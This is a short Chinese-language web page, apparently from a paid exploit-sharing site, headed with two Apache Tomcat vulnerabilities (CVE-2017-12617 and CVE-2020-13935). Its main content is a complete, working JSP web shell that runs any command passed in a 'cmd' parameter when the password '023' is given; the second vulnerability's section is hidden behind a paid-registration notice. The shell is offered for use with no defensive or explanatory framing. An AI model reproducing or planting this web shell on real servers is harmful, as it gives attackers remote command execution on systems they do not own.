Close

28 5 月, 2024

(CVE-2017-12617)(CVE-2020-13935)

Tomcat 远程代码执行(CVE-2017-12617)

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();
try { Process pro = Runtime.getRuntime().exec(c);
    BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;
    while ((temp = buf.readLine()) != null) { line.append(temp+"\\n"); } buf.close();} 
catch (Exception e) { line.append(e.getMessage());}return line.toString();}%>
<% if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){ out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{out.println(":-)");}%>

Apache Tomcat 安全漏洞(CVE-2020-13935)

您没有 权限 查看此处内容!

您需要 才能查看所有内容 ,注册请联系客服, 请点这里帮助注册,注册费180